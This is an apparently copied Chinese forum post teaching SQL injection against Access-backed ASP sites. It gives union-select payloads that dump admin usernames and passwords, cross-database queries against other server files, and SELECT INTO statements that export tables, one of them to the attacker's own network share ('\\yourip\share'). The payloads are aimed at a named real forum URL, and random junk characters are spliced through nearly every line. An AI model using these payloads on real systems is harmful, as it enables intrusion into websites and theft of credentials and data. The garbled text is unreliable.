--------------------------------------------------------------
* {& A0 [1 T8 I8 y5 b6 [6 C5 g, Uunion查询法1 x1 }+ `3 N; n8 G
首先要说的就是查询办法,一般的查询办法就是. x( S3 r, w6 t9 S0 q/ K$ l! [2 F
: }1 C/ q, c* ]" e程序代码: x. H, ^" M+ Q4 H9 R& K( u3 ]0 P4 k
and 1=(select count(*) from admin where left(id,1)='1')/ u. K+ L6 i- P% Q/ v0 Z$ _
3 F1 ^: _0 K. S, q$ Z0 ~5 h
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
) j6 ~% p7 I0 K所以这个时候,union select横空出现.别以为只能在PHP里用哦...
1 C( I6 D: ^( S8 i/ [+ w' E7 \$ D譬如你有一个ACCESS点:
0 h# |7 w5 {. W$ ]5 i3 V8 n2 ]程序代码) O$ \8 ? G+ h7 F3 h, ]
http://bbs.tian6.com/xiaoyang.asp?coder=1
# U/ e% H0 o& O$ |0 }1 H, ^) b
9 Y# ?& M! A0 u6 i- m2 i8 D知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
- D( E3 x I1 x* C/ [; Y+ v% l( |1 ~. K然后我们直接来:
8 _" u$ k G) }6 `3 o程序代码
( A# F* F+ ?# H" }0 f- K" k: ehttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
! q+ ]. ~+ u+ R8 O q( m* _- r J# Q
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.+ |+ O- y0 I; V [/ ^. [
" r* p$ G( Y. | D9 [& h% C6 I/ X
/ A5 \8 I3 e, U% J/ o
, z# ?% _1 L9 m$ v) ?---------------------------------------------------------------+ z; }' C5 d8 S+ M
Access跨库查询7 {% G- J, q- U' ?5 A" q
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.: v! I w, ]( c8 ~3 Q; Q5 ~0 O
跨库的查询语句:3 Z% T% M8 X: a$ J* ~7 Y6 a
子查询:. L4 |0 }# S. Y. O
程序代码, m, D/ H) B3 k+ _; {
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
1 |$ a( \" w$ S$ U( O; a% @% V: u5 {6 P
union查询:$ U, e2 M( U$ K& }2 g9 F( j
程序代码: a8 ~1 |" S* z3 N( {6 f
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
5 e( `/ ~4 Y6 \! N8 F2 ^8 s* b
( ]: J+ l+ K& U. ]跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
7 H6 ^& x* y$ d4 j8 R' k! q程序代码% [# [% T3 Q* B: {( U" f1 K
http://www.4ngel.net/article/46.htm
! e/ D; M t7 o# j/ X. Rhttp://hf110.com/Article/hack/rqsl/200502/66.html
+ L. D: B0 F6 R7 C- R% W, I% U
( V7 n! B% f X o; ^# J; c/ _---------------------------------------------------------------) M- U3 l4 _: D4 n D
Access注入,导出txt,htm,html) F" g0 `, ~, b" P
子查询语句:
4 B' W ~" N% T' e% I# A$ b程序代码 f) `; r. J1 I& y: A
Select * into [test.txt] in 'd:\web\' 'text;' from admin& c. C/ }' Z8 a: O; G ]1 o% D
8 z2 X0 Q$ t9 g这样就把admin表的内容以test类型存进了d:\web里面.
8 z6 h( J; Z) PUNION查询:6 k, L6 @& h: ~+ h
程序代码1 B% [* o0 P7 }% D2 R, g+ @$ N
union select * into [admin.txt] in 'c:\' 'test;' from admin
2 K/ t) M3 w% {& {, l2 }9 f: I0 c; m/ |
而且这里也可以保存到本地来:# I8 n0 K3 T8 v% P W6 s: d
程序代码4 f6 S4 N! @& V7 n% z2 j1 F8 O
Select * into [test.txt] in '\\yourip\share' 'text;' from admin1 p4 `( e8 e) D! ?/ m. c
+ K$ M0 y% ^5 u7 H; E
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
5 M# U+ I1 w* `, l( Y; M, I c1 S3 U
程序代码
1 g" C8 w. y- f' N/ ~! Rhttp://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7" \, X7 R; F+ T
0 g8 D! j4 d* i; B; t6 \' G因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
9 y, u1 t, h V7 V8 n& I |
发表于 2012-9-15 14:20:57
收藏
支持
反对